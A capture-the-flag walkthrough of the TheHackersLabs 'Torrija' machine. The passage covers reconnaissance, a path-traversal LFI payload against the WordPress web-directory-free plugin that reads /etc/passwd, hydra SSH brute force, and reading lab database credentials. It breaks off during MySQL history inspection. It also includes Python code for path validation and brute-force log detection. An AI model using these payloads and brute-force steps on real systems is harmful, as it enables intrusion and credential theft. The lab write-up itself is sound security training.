TheHackersLabs-Torrijas-Walkthrough
城南花已开

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.183 08:00:27:86:4d:2e PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f7:93:e4 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.025 seconds (126.42 hosts/sec). 4 responded
export ip=192.168.60.183
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.183:22
Open 192.168.60.183:80
Open 192.168.60.183:3306
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 14:53 CST
Initiating ARP Ping Scan at 14:53
Scanning 192.168.60.183 [1 port]
Completed ARP Ping Scan at 14:53, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:53
Completed Parallel DNS resolution of 1 host. at 14:53, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:53
Scanning 192.168.60.183 [3 ports]
Discovered open port 22/tcp on 192.168.60.183
Discovered open port 80/tcp on 192.168.60.183
Discovered open port 3306/tcp on 192.168.60.183
Completed SYN Stealth Scan at 14:53, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.183
Host is up, received arp-response (0.00061s latency).
Scanned at 2025-02-14 14:53:03 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3306/tcp open mysql syn-ack ttl 64
MAC Address: 08:00:27:86:4D:2E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Open port 80 in a browser.

A quick look shows that the page is basically all anchor links.


Check what the site is running.

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.183
Status : 200 OK
Title : torrija.thl
IP : 192.168.60.183
Country : RESERVED, ZZ

Summary : Apache[2.4.62], Bootstrap, Email[[email protected]], Frame, HTML5, HTTPServer[Debian Linux][Apache/2.4.62 (Debian)], JQuery[3.0.0], Script[text/javascript], X-UA-Compatible[IE=edge]

Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.

Version : 2.4.62 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/

[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.

Website : https://getbootstrap.com/

[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.

String : [email protected]

[ Frame ]
This plugin detects instances of frame and iframe HTML
elements.


[ HTML5 ]
HTML version 5, detected by the doctype declaration


[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

OS : Debian Linux
String : Apache/2.4.62 (Debian) (from server string)

[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.

Version : 3.0.0
Website : http://jquery.com/

[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.

String : text/javascript

[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx

String : IE=edge

HTTP Headers:
HTTP/1.1 200 OK
Date: Fri, 14 Feb 2025 06:55:45 GMT
Server: Apache/2.4.62 (Debian)
Last-Modified: Thu, 13 Feb 2025 18:50:56 GMT
ETag: "5161-62e0a89c85c3e-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3061
Connection: close
Content-Type: text/html

Directory brute-forcing

It turns out there is also a sub-site running WordPress.

❯ feroxbuster -u http://$ip

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.60.183
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
[####################] - 65s 301341/301341 0s found:1045 errors:214
[####################] - 29s 30000/30000 1029/s http://192.168.60.183/
[####################] - 5s 30000/30000 5681/s http://192.168.60.183/images/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 50s 30000/30000 605/s http://192.168.60.183/wordpress/
[####################] - 4s 30000/30000 8251/s http://192.168.60.183/js/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 4s 30000/30000 7218/s http://192.168.60.183/css/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 46s 30000/30000 645/s http://192.168.60.183/wordpress/wp-content/
[####################] - 54s 30000/30000 557/s http://192.168.60.183/wordpress/wp-admin/
[####################] - 13s 30000/30000 2362/s http://192.168.60.183/wordpress/wp-includes/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 5s 30000/30000 6652/s http://192.168.60.183/wordpress/wp-content/uploads/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 5s 30000/30000 5468/s http://192.168.60.183/wordpress/wp-content/languages/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 5s 30000/30000 6020/s http://192.168.60.183/wordpress/wp-includes/Requests/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 5s 30000/30000 5790/s http://192.168.60.183/wordpress/wp-includes/images/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 10s 30000/30000 2878/s http://192.168.60.183/wordpress/wp-includes/fonts/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 48s 30000/30000 625/s http://192.168.60.183/wordpress/wp-includes/blocks/
[####################] - 6s 30000/30000 4803/s http://192.168.60.183/wordpress/wp-includes/sitemaps/ => Directory listing (add --scan-dir-listings to scan)%

LFI exploitation

Enumerate the plugins with wpscan, using aggressive detection so that all plugins are checked.

❯ wpscan --url http://$ip/wordpress -e u,ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.183/wordpress/ [192.168.60.183]
[+] Started: Fri Feb 14 14:59:14 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.62 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.60.183/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.60.183/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.60.183/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.183/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.2 identified (Latest, released on 2025-02-11).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.60.183/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.60.183/wordpress/, Match: 'WordPress 6.7.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.60.183/wordpress/wp-content/plugins/akismet/
| Latest Version: 5.3.6 (up to date)
| Last Updated: 2025-02-04T21:01:00.000Z
| Readme: http://192.168.60.183/wordpress/wp-content/plugins/akismet/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.60.183/wordpress/wp-content/plugins/akismet/, status: 200
|
| Version: 5.3.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.60.183/wordpress/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.60.183/wordpress/wp-content/plugins/akismet/readme.txt

[+] web-directory-free
| Location: http://192.168.60.183/wordpress/wp-content/plugins/web-directory-free/
| Last Updated: 2024-12-11T14:06:00.000Z
| Readme: http://192.168.60.183/wordpress/wp-content/plugins/web-directory-free/readme.txt
| [!] The version is out of date, the latest version is 1.7.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.60.183/wordpress/wp-content/plugins/web-directory-free/, status: 200
|
| Version: 1.7.2 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.60.183/wordpress/wp-content/plugins/web-directory-free/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] administrator
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Feb 14 15:00:36 2025
[+] Requests Done: 109129
[+] Cached Requests: 42
[+] Data Sent: 31.695 MB
[+] Data Received: 14.64 MB
[+] Memory used: 437.473 MB
[+] Elapsed time: 00:01:21

The web-directory-free plugin is out of date: the installed version is 1.7.2 while the latest is 1.7.5.


A search online shows that this version has an LFI vulnerability.


Let's try it.

Sure enough, it returns the contents of a sensitive file.

❯ curl -X POST http://torrija.thl/wordpress/wp-admin/admin-ajax.php -d "from_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd"
{"html":"root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndebian:x:1000:1000:debian,,,:\/home\/debian:\/bin\/bash\nmysql:x:102:110:MySQL Server,,,:\/nonexistent:\/bin\/false\nprimo:x:1001:1001::\/home\/primo:\/bin\/bash\npremo:x:1002:1002::\/home\/premo:\/bin\/bash\n","hash":"91d75cb01d4a5d829e86bca1858566db","map_markers":"","map_listings":"","hide_show_more_listings_button":1,"sql":"","params":"","base_url":"http:\/\/torrija.thl\/wordpress"}%

Tidied up a little:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
primo:x:1001:1001::/home/primo:/bin/bash
premo:x:1002:1002::/home/premo:/bin/bash

This gives us two users, primo and premo.

I tried to read the user flag directly, with no luck.

Probably insufficient permissions.

But look closely at the html field: when the file does not exist it is null, whereas when the file exists but cannot be read it is an empty string.

❯ curl -X POST http://torrija.thl/wordpress/wp-admin/admin-ajax.php -d "from_set_ajax=1&action=w2dc_controller_request&template=/home/primo/user.txt"
{"html":null,"hash":"2f8d20ccdadf991c5fa992b7d7b1c79d","map_markers":"","map_listings":"","hide_show_more_listings_button":1,"sql":"","params":"","base_url":"http:\/\/torrija.thl\/wordpress"}%
❯ curl -X POST http://torrija.thl/wordpress/wp-admin/admin-ajax.php -d "from_set_ajax=1&action=w2dc_controller_request&template=/home/premo/user.txt"
{"html":"","hash":"915fb6db2aff54fe69bf636cdbb97076","map_markers":"","map_listings":"","hide_show_more_listings_button":1,"sql":"","params":"","base_url":"http:\/\/torrija.thl\/wordpress"}%

I tried to read wp-config.php, with no luck.

The file exists, but it cannot be read.

❯ curl -X POST http://torrija.thl/wordpress/wp-admin/admin-ajax.php -d "from_set_ajax=1&action=w2dc_controller_request&template=/var/www/html/wordpress/wp-config.php"
{"html":"","hash":"6336cf0a5ee6eb5e5899b7fbe2353afd","map_markers":"","map_listings":"","hide_show_more_listings_button":1,"sql":"","params":"","base_url":"http:\/\/torrija.thl\/wordpress"}%
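The root cause of the LFI above is a template name taken straight from the request and joined to a directory with no containment check. The following is an added illustration written for this walkthrough, not the plugin's own code: a hypothetical unsafe join next to a hardened version that rejects absolute paths, refuses anything that normalises outside the template root, and only allows expected extensions. TEMPLATE_ROOT, ALLOWED_SUFFIXES and the function names are assumptions for the example.

```python
import os
from pathlib import Path

# Hypothetical template directory used only for this illustration; it is not the
# real layout of web-directory-free or of the Torrija box.
TEMPLATE_ROOT = Path("/var/www/html/wordpress/wp-content/plugins/example-plugin/templates")
ALLOWED_SUFFIXES = {".php", ".tpl"}


class TemplateRejected(ValueError):
    """Raised when the user-supplied template name must not be served."""


def resolve_template_unsafe(user_value: str, root: Path = TEMPLATE_ROOT) -> Path:
    """The shape of the bug (hypothetical code, not the plugin's own): the request
    parameter is joined to a base directory with no containment check, so '../'
    sequences and absolute paths walk straight out of the template folder."""
    return Path(os.path.normpath(root / user_value))


def resolve_template(user_value: str, root: Path = TEMPLATE_ROOT) -> Path:
    """Hardened form: accept only a relative name that still lies inside root after
    normalisation and that carries an expected template extension."""
    if not user_value or "\x00" in user_value:
        raise TemplateRejected("empty or NUL byte")
    if os.path.isabs(user_value):
        raise TemplateRejected("absolute path")
    # Lexical normalisation collapses '.', '..' and repeated separators without
    # touching the filesystem, so the check works even before the file exists.
    normalised = Path(os.path.normpath(root / user_value))
    try:
        normalised.relative_to(root)  # component-wise containment, not a string prefix
    except ValueError:
        raise TemplateRejected("escapes template root") from None
    if normalised.suffix.lower() not in ALLOWED_SUFFIXES:
        raise TemplateRejected("disallowed extension")
    return normalised


def check(user_value: str) -> str:
    """Return 'ok' or the rejection reason; handy for tests and for log review."""
    try:
        resolve_template(user_value)
        return "ok"
    except TemplateRejected as exc:
        return str(exc)


if __name__ == "__main__":
    for value in ("listing.php", "../../../../../etc/passwd", "/home/premo/user.txt"):
        print(f"{value!r}: unsafe -> {resolve_template_unsafe(value)}, hardened -> {check(value)}")
```

Two practical notes: once the file is known to exist, a production check should additionally compare os.path.realpath() of the result against the root so that symlinks inside the template directory cannot point elsewhere; and the null-versus-empty-string behaviour observed above is itself a leak (it lets a caller test whether arbitrary files exist), so a rejected template should produce one uniform error response regardless of why it was rejected.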

Brute-forcing with hydra

Stuck at this point, the only option left was to brute-force SSH.

Brute-force the two users separately.

Eventually this yields the password cassandra for the user premo.

❯ hydra -l premo -P /usr/share/wordlists/rockyou.txt ssh://$ip
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-14 16:53:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.183:22/
[STATUS] 203.00 tries/min, 203 tries in 00:01h, 14344201 to do in 1177:42h, 11 active
[STATUS] 197.00 tries/min, 591 tries in 00:03h, 14343813 to do in 1213:32h, 11 active
[22][ssh] host: 192.168.60.183 login: premo password: cassandra
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-14 16:59:10
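A run like the one above, roughly 200 attempts per minute from one address, is very loud on the server side. As an added example for this walkthrough (not from the original post), here is a small sliding-window detector over sshd lines of the kind found in /var/log/auth.log; the log lines are constructed for the example, and the threshold and window are arbitrary assumptions to tune for your own environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of what a password-guessing run looks like from the server
# side; these lines are made up for the example, not taken from the box.
SAMPLE_AUTH_LOG = """\
Feb 14 16:53:35 Torrija-TheHackersLabs sshd[2101]: Failed password for premo from 192.168.60.100 port 51002 ssh2
Feb 14 16:53:36 Torrija-TheHackersLabs sshd[2103]: Failed password for invalid user admin from 192.168.60.100 port 51004 ssh2
Feb 14 16:53:36 Torrija-TheHackersLabs sshd[2105]: Failed password for premo from 192.168.60.100 port 51006 ssh2
Feb 14 16:53:37 Torrija-TheHackersLabs sshd[2107]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.60.100 user=premo
Feb 14 16:53:37 Torrija-TheHackersLabs sshd[2107]: Failed password for premo from 192.168.60.100 port 51008 ssh2
Feb 14 16:53:38 Torrija-TheHackersLabs sshd[2109]: Failed password for premo from 192.168.60.100 port 51010 ssh2
Feb 14 16:53:40 Torrija-TheHackersLabs sshd[2111]: Failed password for primo from 10.0.0.5 port 40000 ssh2
Feb 14 16:53:41 Torrija-TheHackersLabs sshd[2113]: Failed password for premo from 192.168.60.100 port 51012 ssh2
Feb 14 16:59:09 Torrija-TheHackersLabs sshd[2401]: Accepted password for premo from 192.168.60.100 port 51300 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_line(line, year=2025):
    """Return (timestamp, result, user, ip) for an sshd password line, else None.
    Syslog timestamps carry no year, so the caller supplies it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Sliding-window detector: one 'burst' alert per source IP once it reaches
    `threshold` failed passwords inside `window_s` seconds, plus a
    'success_after_burst' alert if that IP later authenticates successfully
    (the case that should page someone, as it did on this box)."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    burst_ips = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                 # pam_unix chatter and other lines are ignored
        ts, result, user, ip = parsed
        if result == "Failed":
            q = failures[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()          # drop failures that fell out of the window
            if len(q) >= threshold and ip not in burst_ips:
                burst_ips.add(ip)
                alerts.append({"type": "burst", "ip": ip, "count": len(q), "at": ts})
        elif result == "Accepted" and ip in burst_ips:
            alerts.append({"type": "success_after_burst", "ip": ip, "user": user, "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

With the sample input the detector raises a burst alert for 192.168.60.100 on its fifth failure and a success-after-burst alert for the later accepted login, while the single failure from 10.0.0.5 stays below the threshold. Key-only authentication, or a rate limiter such as fail2ban driven by the same log, removes the attack surface that made this step possible.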

User privilege escalation

❯ ssh premo@$ip
The authenticity of host '192.168.60.183 (192.168.60.183)' can't be established.
ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.183' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux Torrija-TheHackersLabs 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 13 20:08:49 2025 from 192.168.18.204
premo@Torrija-TheHackersLabs:~$

Reading wp-config.php gives the database password.

Log in with it

and see whether there is anything useful.

premo@Torrija-TheHackersLabs:~$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'admin' );

/** Database password */
define( 'DB_PASSWORD', 'afdvasgvfdsabdgvs6a9vd8sv' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );

/**#@-*/

/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

premo@Torrija-TheHackersLabs:~$ mysql -uadmin -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 2638
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0,001 sec)

MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+---------------------------------+
| Tables_in_wordpress |
+---------------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
| wp_w2dc_content_fields |
| wp_w2dc_content_fields_groups |
| wp_w2dc_directories |
| wp_w2dc_levels |
| wp_w2dc_levels_relationships |
| wp_w2dc_locations_levels |
| wp_w2dc_locations_relationships |
| wp_wcsearch_cache |
+---------------------------------+
20 rows in set (0,000 sec)

MariaDB [wordpress]> select * from wp_users;
+----+---------------+------------------------------------+---------------+------------+--------------------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+---------------+------------------------------------+---------------+------------+--------------------------------+---------------------+---------------------+-------------+---------------+
| 1 | administrator | $P$BKO5Z5XpxXzxeVSnk6HZ68Lp.4NA7Y0 | administrator | [email protected] | http://192.168.18.57/wordpress | 2025-02-13 15:53:30 | | 0 | administrator |
+----+---------------+------------------------------------+---------------+------------+--------------------------------+---------------------+---------------------+-------------+---------------+
1 row in set (0,000 sec)

There is also a MySQL history file in the user's home directory.

premo@Torrija-TheHackersLabs:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
use\040Torrijas;
show\040tables;
select\040*\040from\040primo;
exit;

We can tidy it up with xargs to decode the escaped characters.

premo@Torrija-TheHackersLabs:~$ cat .mysql_history |xargs -0 echo -e
_HiStOrY_V2_
show databases;
use Torrijas;
show tables;
select * from primo;
exit;
